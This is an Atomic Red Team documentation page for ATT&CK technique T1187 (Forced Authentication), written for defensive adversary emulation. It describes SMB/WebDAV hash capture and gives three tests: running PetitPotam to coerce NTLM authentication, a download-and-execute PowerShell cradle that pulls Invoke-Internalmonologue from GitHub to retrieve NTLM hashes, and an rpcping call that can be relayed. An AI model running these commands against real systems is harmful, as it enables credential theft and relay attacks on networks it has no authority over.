Skip to content
Atomic Red Team
atomics
T1187

T1187 - Forced Authentication

Description from ATT&CK (opens in a new tab)

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection (opens in a new tab)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line Brute Force (opens in a new tab) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection (opens in a new tab)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)

Atomic Tests


Atomic Test #1 - PetitPotam

This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system.

Supported Platforms: Windows

auto_generated_guid: 485ce873-2e65-4706-9c7e-ae3ab9e14213

Inputs:

NameDescriptionTypeDefault Value
captureServerIPComputer IP to use to receive the authentication (ex. attacker machine used for NTLM relay)string10.0.0.3
targetServerIPComputer IP to force authentication from (ex. domain controller)string10.0.0.2
efsApiEFS API to use to coerce authenticationinteger1
petitpotam_pathPetitPotam Windows executablepathPathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe

Attack Commands: Run with powershell!

& "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
Write-Host "End of PetitPotam attack"

Dependencies: Run with powershell!

Description: PetitPotam binary must exist on disk and at specified location (#{petitpotam_path}).

And the computer must be domain joined (implicit authentication).

Check Prereq Commands:
if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 }
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}"


Atomic Test #2 - WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS

PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 7f06b25c-799e-40f1-89db-999c9cc84317

Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"


Atomic Test #3 - Trigger an authenticated RPC call to a target server with no Sign flag set

RpcPing command can be used to trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign flag not Set) Ref: https://twitter.com/splinter_code/status/1421144623678988298 (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 81cfdd7f-1f41-4cc5-9845-bb5149438e37

Inputs:

NameDescriptionTypeDefault Value
custom_portSpecify the custom port numberinteger9997
server_ipSpecify the server IP address. If not specified, the loop back IP will be usedstring127.0.0.1

Attack Commands: Run with powershell!

rpcping -s #{server_ip} -e #{custom_port} /a connect /u NTLM 1>$Null